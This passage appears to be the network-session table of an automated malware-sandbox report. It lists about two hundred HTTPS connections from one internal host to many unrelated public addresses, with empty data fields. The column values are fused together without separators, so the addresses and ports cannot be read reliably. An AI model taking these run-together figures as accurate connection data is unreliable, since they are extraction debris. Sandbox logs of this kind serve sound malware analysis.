                                            18070192.168.2.1544508195.49.61.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18071192.168.2.154291236.166.8.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18072192.168.2.1536300138.103.55.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18073192.168.2.155972283.223.216.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18074192.168.2.1548090170.136.253.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18075192.168.2.1537362200.80.22.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18076192.168.2.155717472.182.16.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18077192.168.2.1546940111.70.107.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18078192.168.2.1541626103.3.48.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18079192.168.2.1544344200.103.180.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18080192.168.2.15512924.63.86.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18081192.168.2.1539462170.220.28.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18082192.168.2.154287652.149.13.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18083192.168.2.154818247.64.85.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18084192.168.2.15490321.96.26.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18085192.168.2.1536024120.234.103.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18086192.168.2.1535180213.229.123.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18087192.168.2.1535332121.9.138.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18088192.168.2.1553310196.121.88.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18089192.168.2.155106225.121.59.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18090192.168.2.155889225.188.14.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18091192.168.2.1559634179.81.153.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18092192.168.2.1542606128.50.14.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18093192.168.2.1558008161.105.161.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18094192.168.2.1555976171.235.152.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18095192.168.2.1556570210.172.175.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18096192.168.2.1543542178.121.16.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18097192.168.2.155892427.46.173.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18098192.168.2.1548406156.4.47.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18099192.168.2.1538108190.214.160.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18100192.168.2.1533088125.138.62.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18101192.168.2.1551252186.1.8.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18102192.168.2.1554554180.188.239.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18103192.168.2.1555138173.123.242.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18104192.168.2.1548762165.24.7.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18105192.168.2.154641842.77.125.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18106192.168.2.154690832.3.70.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18107192.168.2.153280484.8.193.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18108192.168.2.1552082222.75.216.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18109192.168.2.154661836.30.107.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18110192.168.2.1558562210.109.206.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18111192.168.2.1543188119.3.23.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18112192.168.2.1545358179.114.13.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18113192.168.2.153772435.14.137.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18114192.168.2.155204842.213.169.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18115192.168.2.154081276.71.21.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18116192.168.2.1555116133.85.11.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18117192.168.2.155635441.229.95.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18118192.168.2.1559386147.204.252.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18119192.168.2.1553626112.220.96.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18120192.168.2.154223243.90.200.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18121192.168.2.1547676222.76.110.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18122192.168.2.155708853.108.47.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18123192.168.2.1547950222.235.29.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18124192.168.2.1546554163.204.84.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18125192.168.2.1534668197.99.87.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18126192.168.2.155775857.114.8.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18127192.168.2.1534320183.174.40.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18128192.168.2.1548464191.204.167.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18129192.168.2.155749297.190.38.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18130192.168.2.155652239.44.135.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18131192.168.2.1542752167.8.94.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18132192.168.2.1546876202.56.194.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18133192.168.2.1549432194.86.254.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18134192.168.2.153835641.164.221.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18135192.168.2.1547826122.244.8.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18136192.168.2.1533648117.247.148.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18137192.168.2.154955476.134.255.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18138192.168.2.1551750163.184.212.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18139192.168.2.154826058.67.119.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18140192.168.2.155226820.78.218.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18141192.168.2.155278649.208.44.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18142192.168.2.154016259.54.214.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18143192.168.2.1534518103.205.21.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18144192.168.2.1537466205.237.207.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18145192.168.2.1544052209.21.3.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18146192.168.2.1557220128.107.130.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18147192.168.2.154368646.204.72.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18148192.168.2.1540512116.2.5.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18149192.168.2.1550162100.40.209.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18150192.168.2.1552404106.121.149.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18151192.168.2.154721273.63.2.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18152192.168.2.153617494.130.131.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18153192.168.2.1541814133.90.121.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18154192.168.2.1544252172.166.33.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18155192.168.2.154324680.97.163.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18156192.168.2.153676686.217.161.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18157192.168.2.1558844112.27.126.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18158192.168.2.1552786128.9.198.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18159192.168.2.155444658.72.106.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18160192.168.2.1537500122.194.66.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18161192.168.2.155630868.136.129.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18162192.168.2.155816896.204.204.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18163192.168.2.1557854153.93.173.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18164192.168.2.1555488144.236.36.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18165192.168.2.1533426141.234.37.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18166192.168.2.1533378169.79.245.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18167192.168.2.155326899.146.204.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18168192.168.2.1541294128.94.116.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18169192.168.2.154980481.177.35.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18170192.168.2.1557256142.6.154.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18171192.168.2.1557084148.43.238.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18172192.168.2.1549250211.64.20.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18173192.168.2.1540144157.113.233.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18174192.168.2.154551251.223.186.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18175192.168.2.1539504104.117.99.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18176192.168.2.1542024108.15.255.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18177192.168.2.1542472183.82.114.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18178192.168.2.153428634.245.115.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18179192.168.2.155301691.20.77.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18180192.168.2.154782213.196.40.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18181192.168.2.15465645.201.163.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18182192.168.2.1556208204.244.9.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18183192.168.2.155586482.197.64.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18184192.168.2.1545124121.204.103.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18185192.168.2.1556530191.182.221.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18186192.168.2.155573485.202.89.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18187192.168.2.155334234.77.55.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18188192.168.2.1540564153.126.219.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18189192.168.2.1549532218.125.40.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18190192.168.2.1559360129.81.53.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18191192.168.2.1535916119.19.111.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18192192.168.2.155638241.240.21.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18193192.168.2.1550710184.49.241.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18194192.168.2.1540756167.194.187.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18195192.168.2.153729489.254.16.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18196192.168.2.154166688.223.125.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18197192.168.2.1543484101.80.40.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18198192.168.2.1545802211.29.157.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18199192.168.2.1560134141.132.136.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18200192.168.2.1535736135.4.23.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18201192.168.2.1544262180.194.18.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18202192.168.2.1539644117.129.155.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18203192.168.2.155555264.23.93.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18204192.168.2.1534430183.126.210.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18205192.168.2.155902078.81.45.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18206192.168.2.1547762177.35.229.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18207192.168.2.153819065.222.63.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18208192.168.2.1542226186.18.32.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18209192.168.2.1551380156.173.107.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18210192.168.2.1547412110.72.9.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18211192.168.2.1539660200.24.133.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18212192.168.2.1553914123.101.137.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18213192.168.2.1556432163.228.253.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18214192.168.2.1550502113.246.244.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18215192.168.2.154596461.76.75.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18216192.168.2.154776660.136.107.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18217192.168.2.1556552136.222.120.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18218192.168.2.155153851.176.160.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18219192.168.2.153853246.29.121.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18220192.168.2.154098420.159.118.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18221192.168.2.1537210121.216.28.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18222192.168.2.1556052186.122.3.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18223192.168.2.1559178211.34.164.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18224192.168.2.1548044175.166.22.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18225192.168.2.1560156109.68.68.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18226192.168.2.1544642135.252.52.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18227192.168.2.1542438157.208.149.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18228192.168.2.1547442113.38.73.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18229192.168.2.1535260182.17.107.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18230192.168.2.1548334182.29.28.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18231192.168.2.1543092147.182.49.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18232192.168.2.154320065.213.86.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18233192.168.2.1534746117.193.158.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18234192.168.2.154686080.42.140.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18235192.168.2.1555622202.15.147.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18236192.168.2.1537790111.95.239.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18237192.168.2.1556446107.14.215.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18238192.168.2.1550524171.221.118.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18239192.168.2.153598260.174.228.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18240192.168.2.1556152178.190.191.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18241192.168.2.154645683.133.248.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18242192.168.2.15453161.141.219.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18243192.168.2.153795841.141.42.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18244192.168.2.154416060.253.233.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18245192.168.2.1533410141.99.12.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18246192.168.2.154214678.105.108.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18247192.168.2.1547040220.225.158.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18248192.168.2.153352038.61.18.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18249192.168.2.1552570126.228.68.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18250192.168.2.153419854.20.201.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18251192.168.2.153468293.250.204.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18252192.168.2.1547240168.76.72.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18253192.168.2.155019217.135.153.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18254192.168.2.1550102201.143.72.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18255192.168.2.154263659.30.5.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18256192.168.2.155800282.209.195.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18257192.168.2.153414857.152.37.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18258192.168.2.154688687.186.72.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18259192.168.2.154396243.247.146.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18260192.168.2.1550592201.155.67.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18261192.168.2.154783496.0.126.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18262192.168.2.153944844.228.1.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18263192.168.2.155334073.69.150.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18264192.168.2.1542626101.119.80.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18265192.168.2.155270261.106.81.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18266192.168.2.155769020.37.83.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18267192.168.2.153864058.129.220.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18268192.168.2.153427899.145.162.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18269192.168.2.1539402117.74.239.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18270192.168.2.154902450.32.81.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18271192.168.2.1537332174.51.104.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18272192.168.2.1560546149.238.143.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18273192.168.2.155867874.120.14.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18274192.168.2.155601279.189.168.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18275192.168.2.1549478206.149.82.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18276192.168.2.1545534209.11.70.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18277192.168.2.154152093.44.157.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18278192.168.2.1547322151.0.197.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18279192.168.2.1534616185.160.208.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18280192.168.2.155670437.66.148.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18281192.168.2.1559422130.184.8.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18282192.168.2.154367019.229.93.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18283192.168.2.153987646.30.215.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18284192.168.2.155169473.27.40.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18285192.168.2.1546602160.90.94.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18286192.168.2.1537394212.178.106.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18287192.168.2.1547940138.230.126.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18288192.168.2.1557580148.72.103.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18289192.168.2.155435831.70.154.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18290192.168.2.1547814220.230.174.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            18291192.168.2.15564109.149.85.221443
                                            TimestampBytes transferredDirectionData


